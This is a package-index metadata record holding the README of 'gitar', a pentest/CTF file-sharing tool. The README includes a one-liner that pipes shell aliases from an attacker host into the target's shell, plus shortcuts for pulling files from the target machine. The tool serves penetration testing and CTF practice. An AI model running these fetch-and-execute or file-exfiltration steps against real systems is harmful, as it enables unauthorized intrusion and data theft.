{"id":19544861,"url":"https://github.com/ariary/gitar","last_synced_at":"2025-06-12T06:12:12.664Z","repository":{"id":109492907,"uuid":"434202697","full_name":"ariary/gitar","owner":"ariary","description":" 📡 Ease file sharing during pentest/CTF 🎸","archived":false,"fork":false,"pushed_at":"2022-10-18T10:31:08.000Z","size":4470,"stargazers_count":12,"open_issues_count":6,"forks_count":3,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-26T19:39:26.656Z","etag":null,"topics":["aliases","ctf","exfiltration","file-sharing","pentest","pentest-tool","shortcuts","webhook"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"unlicense","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ariary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-12-02T11:58:10.000Z","updated_at":"2024-03-17T13:54:11.000Z","dependencies_parsed_at":null,"dependency_job_id":"0a4d71ba-2265-489d-b9db-8b2cce3bbf58","html_url":"https://github.com/ariary/gitar","commit_stats":null,"previous_names":[],"tags_count":11,"template":false,"template_full_name":null,"purl":"pkg:github/ariary/gitar","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fgitar","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fgitar/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fgitar/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fgitar/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ariary","download_url":"https://codeload.github.com/ariary/gitar/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fgitar/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259410176,"owners_count":22852975,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aliases","ctf","exfiltration","file-sharing","pentest","pentest-tool","shortcuts","webhook"],"created_at":"2024-11-11T03:32:39.565Z","updated_at":"2025-06-12T06:12:12.624Z","avatar_url":"https://github.com/ariary.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cdiv align=center\u003e\n\u003ch1\u003egitar\u003c/h1\u003e\n\u003cimg src=https://github.com/ariary/gitar/blob/main/img/gitar-logo.png width=150\u003e\n\t\n\u003cstrong\u003e📡 A more sophisticated python HTTP server sibling \u003cbr\u003e🎸 focusing on having the simplest interactions for file exchange (Pentest/CTF)\u003cbr\u003e🎵 with additional functionalities: \u003ca href=#send-mode\u003equick file sending\u003c/a\u003e and \u003ca href=#webhook-mode\u003eHTTP webhook logging\u003c/a\u003e \u003c/strong\u003e\n\u003cbr\u003e\n\u003c/div\u003e\n\n|![demo](https://github.com/ariary/gitar/blob/main/img/gitar-screen.png)|\n|:---:|\n|**~\u003e** Have the  ***simplest possible shortcuts*** to upload/download file to/from the target machine\u003cbr\u003e**~\u003e** ***No installation needed*** on target machine\u003cbr\u003e**~\u003e** ***Fast and simple*** deployment|\n\n\n\n## TL;DR *- and listen music*\n\nOn my target machine:\n - **Download a file** from my attacker machine: `pull [file]` *(with filename completion)*\n - **Download a directory** from my attacker machine: `pullr [directory]` *(with filename completion)*\n - **Upload a file** to my attacker machine: `push [file]`\n - **Upload a directory** to my attacker machine: `pushr [directory]`\n\n*Before be able to use these shortcut you have to [set up](#set-up) both machines. Once again, the aim is to made it as simple as possible*\n\n## Set up\n\n\n### 🎸 Launch `gitar` server \n \nOn **Attacker machine**: \n```shell\ngitar\n```\n\nOn **Target machine**:\n\n```shell\n# Get shortcuts and source them. The one-liner corresponding is by default copy on clipboard. \n# It is also provided by step 1. (in gitar output):\nsource \u003c(curl -s http://[attacker_ip:port]/alias)\n```\n\n**And that's all, you can now `push` or `pull` file [🎶](#tldr---and-listen-music)**\n\n \u003csup\u003e[`with 💥`](https://github.com/ariary/bang/blob/main/EXAMPLES.md#share-files)\u003c/sup\u003e\n\n### 🐋 Secure launch of `gitar` server\n\nThis is basicaly the same as launching `gitar` server. But as we expose our http server we become the prey. Hence we must harden a bit the server. To do this we launch `gitar` inside a container and use HTTPS.\n\nThe following steps expose files of current directory. Files uploaded by remote are written inside current directory also.\n\nOn **Attacker machine**: \n```shell\ndocker run -it --rm --net host --cap-drop=all --cap-add=dac_override --user $(id -u):$(id -g)  -v \"${PWD}:/gitar/exchange\" ariary/gitar\n```\n\n**You can now `push`or `pull` file being more safe [🎶](#tldr---and-listen-music)**\n\n\n\n\u003csup\u003e[`with 💥`](https://github.com/ariary/bang/blob/main/EXAMPLES.md#share-files-safely)\u003c/sup\u003e\n\n### Pre-requisites\n\n* HTTP Network connectivity between attacker \u0026 target machines\n* On target machine: `curl` \n\t* `tar` for directory upload \n* On attacker machine: \n\t* `xclip` to copy command on clipboard (not required)\n\t* `tree`: to expose it trough server (not required)\n\t* `dig`: to automatically find extarnal IP (not required)\n\nThe aim is to keep \"target requirements\" as fit as possible. Attacker machine requirements are not a big deal as we have plenty control over it and time to configure it.\n\n## Additional Functionalities\n\n### `send` mode\n\nUse this mode to quickly send a file to a target machine using different method/protocol. The advantage is that you do not have to remember the command line (if required field is not specified with flags it will be asked in a prompt).\n\nIt also has a kind of memory. with the `-l` flag it will use the previous configuration to send the file.\n```shell\n# send /img folder using scp with user root to target.com\ngitar send scp -t target.com -u root /img\n# now send exploit.sh to the same hsot\ngitar send -l exploit.sh\n```\n\n### `webhook` mode\n\nUse this mode if you want to have some logs about incoming HTTP requests. It enables us to:\n* Log request information\n\t* request parameter values\n\t* request header values\n        * request body \n* Override response\n\t* header \n* Forward request to another http server (~ local logging middleware)\n* Serve directory\n```shell\n# log incoming request and retrieve payload parameter value\ngitar webhook -P payload\n```\n## Install\n\n```shell\ngo install github.com/ariary/gitar@latest\n```\n\n## Bonus\n- [Bidirectional exchange](./BONUS.md#bidirectional-exchange)\n  - [🐋 Container and bidirectional exchange](./BONUS.md#-container-and-bidirectional-exchange)\n- [Multiplexing \u0026 Port forwarding](./BONUS.md#multiplexing--port-forwarding)\n- [Load shortcut directly in your bind shell](./BONUS.md#load-shortcut-directly-in-your-bind-shell)\n\n\n\n\t\n\t\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fgitar","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fariary%2Fgitar","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fgitar/lists"}